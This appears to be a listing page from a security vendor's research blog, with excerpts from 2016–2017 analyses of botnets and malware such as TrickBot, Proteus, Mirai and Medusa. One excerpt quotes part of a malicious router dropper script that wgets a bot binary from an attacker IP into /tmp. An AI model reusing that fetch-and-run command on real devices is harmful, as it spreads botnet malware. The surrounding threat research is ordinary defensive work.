botnet


Introduction Dyzap belongs to a family of malware designed to steal confidential information from enormous target applications by installing a “man in the browser” attack into common browsers. FortiGuard Researchers recently discovered a new variant of this Trojan virus. Stolen information may include, but is not limited to, system information and application credentials stored on infected systems. In this blog, we will explain how the malware steals user accounts, acts as a keylogger, and communicates with its C&C server. Stealing... [Read More]
by RSS Bahare Sabouri and He Xu  |  Feb 22, 2017  |  Filed in: Security Research
  One month ago we captured a Word document infected with malicious VBA code, which was detected as WM/Agent!tr by the Fortinet AntiVirus service. Its file name is InternalFax.doc, and its MD5 is 4F2139E3961202B1DFEAE288AED5CB8F.  By our analysis, the Word document was used to download and spread the botnet TrickBot. TrickBot aims at stealing online banking information from browsers when victims are visiting online banks. The targeted banks are from Australia, New Zealand, Germany, United Kingdom, Canada, United States, Israel, and... [Read More]
by RSS Xiaopeng Zhang  |  Dec 06, 2016  |  Filed in: Security Research
  Introduction The ART team at Fortinet has discovered a new malware named Proteus, a multifunctional botnet written in .NET that appears to be a proxy, coin miner, e-commerce merchant account checker, and keylogger. This particular botnet is downloaded by the Andromeda botnet. The handful of malicious features densely packed in this new malware also includes the ability to drop other malware. We have compiled its main features in this brief analysis. Data Encryption All C&C communication is encrypted with a symmetrical algorithm.... [Read More]
by RSS Donna Wang, Jacob (Kuan Long) Leong  |  Nov 28, 2016  |  Filed in: Security Research
A well-known aspect of criminals in any space is that they are unpredictable. They look for holes and vulnerabilities in systems and try to use them to their advantage. Security systems, therefore, have to be architected in a way that assumes attack unpredictability. A new threat emerging on the horizon is called BlackNurse DDoS attack. Fortinet protects organizations against this content based protection, with the IPS signature  "BlackNurse.ICMP.Type.3.Code.3.Flood.DoS", as well as with behavior-based protection through our FortiDDoS... [Read More]
by RSS Hemant Jain  |  Nov 14, 2016  |  Filed in: Industry Trends & News
Following our research on Cyperine 2.0 and Next Man History Stealer, the malware author rebranded their info stealer as Medusa. While it basically has the same featurse as Cyperine, you now need a valid account to access the builder. The example below compares Cyperine on the left and Medusa on the right, which shows a user logged in as Deadzeye. Figure 01. Builder comparison between Cyperine (Left) and Medusa (Right) The builder signatures clearly show that both of these variants were made by the same author, who goes by the name... [Read More]
by RSS David Maciejak and Rommel Joven  |  Nov 10, 2016  |  Filed in: Security Research
Ever since the Mirai DDoS attack was launched a few weeks ago, we have received a number of questions that I will try to answer here. If you have more follow-up questions, please let me know! Who is the Author of Mirai? The presumed developer goes under the pseudonym of 'Anna Senpai' on Hackforums - an English-speaking hacker forum. His/her account on the forum is recent (July 2016). and was probably created when he/she started working on Mirai. For example: July 10 - Begins "killing QBots" August... [Read More]
by RSS Axelle Apvrille  |  Oct 31, 2016  |  Filed in: Industry Trends & News
As further details become available for the massive distributed denial of service attack against Dyn on Oct 21 2016, here are some things FortiDDoS customers can do to protect themselves from a potential Internet of Things (IoT) botnet-based DDoS attack like Mirai. Mirai spreads by compromising vulnerable IoT devices such as DVRs. Many IoT manufacturers failed to secure these devices properly, and they don't include the memory and processing necessary to be updated. They are also usually not in control of the destination of their outbound... [Read More]
by RSS Hemant Jain  |  Oct 24, 2016  |  Filed in: Industry Trends & News
It happened again. This past weekend we witnessed another record-setting DDoS attack, probably primarily caused by infected IoT devices. This attack is attributed to the same piece of code - Linux/Mirai - which attacked KrebsOnSecurity.com and OVH in September. List of Attacks Attributed to Linux/Mirai Date Where Rate Comments Oct 21, 2016 Dyn DNS ? Some of the attacks were coming from hosts infected... [Read More]
by RSS Axelle Apvrille  |  Oct 24, 2016  |  Filed in: Security Research
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year.  In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod... [Read More]
by RSS Bing Liu  |  Oct 20, 2016  |  Filed in: Security Research
In recent years, with the active efforts of law enforcements to takedown infamous Trojan spywares such as Dridex and GameOver Zeus, one could claim that their status as a predominant threat has died down and given way to ransom malware. But this has not not stopped small groups of individuals from trying to keep this lineage of malware alive. The increasing popularity of Malware-as-a-Service (MaaS) platforms has provided a new way for criminals to keep themselves on the malware profit chain by enticing a wider audience with their malicious... [Read More]
by RSS Joie Salvio  |  Oct 11, 2016  |  Filed in: Security Research